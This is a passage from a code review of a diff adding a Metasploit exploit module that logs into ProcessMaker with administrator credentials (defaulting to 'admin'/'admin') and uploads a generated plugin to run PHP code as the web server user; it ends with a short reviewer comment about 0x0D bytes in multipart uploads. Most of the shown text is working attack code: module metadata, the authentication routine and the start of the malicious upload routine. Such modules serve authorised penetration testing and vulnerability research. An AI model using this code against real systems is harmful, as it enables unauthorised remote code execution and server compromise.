modules/exploits/multi/http/processmaker_plugin_upload.rb

```diff
@@ -0,0 +1,195 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ProcessMaker Plugin Upload',
+      'Description'    => %q{
+        This module will generate and upload a plugin to ProcessMaker
+        resulting in execution of PHP code as the web server user.
+
+        Credentials for a valid user account with Administrator roles
+        is required to run this module.
+
+        This module has been tested successfully on ProcessMaker
+        versions 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0 on Windows 7 SP 1;
+        and version 3.2.0 on Debian Linux 8.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'     =>
+        [
+          ['URL', 'http://wiki.processmaker.com/3.0/Plugin_Development']
+        ],
+      'Payload'        => { 'Space' => 20000 },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic Targeting', {} ]],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Aug 25 2010',
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin']),
+        OptString.new('WORKSPACE', [true, 'The ProcessMaker workspace', 'workflow'])
+      ])
+  end
+
+  def login(user, pass)
+    vars_post = Hash[{
+      'form[USR_USERNAME]' => Rex::Text.uri_encode(user, 'hex-normal'),
+      'form[USR_PASSWORD]' => Rex::Text.uri_encode(pass, 'hex-normal')
+    }.to_a.shuffle]
+
+    print_status "Authenticating as user '#{user}'"
+    uri = normalize_uri target_uri.path, "/sys#{@workspace}/en/neoclassic/login/authentication.php"
+    res = send_request_cgi 'method'    => 'POST',
+                           'uri'       => uri,
+                           'cookie'    => @cookie,
+                           'vars_post' => vars_post
+
+    if !res
+      fail_with Failure::Unreachable, 'Connection failed'
+    elsif res.code == 200 && res.body =~ /Loading styles and images/
+      # ProcessMaker 2.x and 3.x
+      print_good "#{peer} Authenticated as user '#{user}'"
+    elsif res.code == 302 && res.headers['location'] =~ /(cases|processes)/
+      # ProcessMaker 1.x
+      print_good "#{peer} Authenticated as user '#{user}'"
+    else
+      fail_with Failure::NoAccess, "#{peer} - Authentication failed"
+    end
+  end
+
+  def upload_plugin plugin_name
+    data = generate_plugin plugin_name
+
+    print_status "#{peer} Uploading plugin '#{plugin_name}' (#{data.length} bytes)"
+
+    # ProcessMaker 1.x requires "-" after the plugin name in the file name
+    fname = "#{plugin_name}-.tar"
+
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric rand(10) + 5}"
```

Comment:
I've had issues with `0x0D` in the past.

I don't remember if that was an issue here - I might have just assumed `Rex::MIME::Message` would be problematic.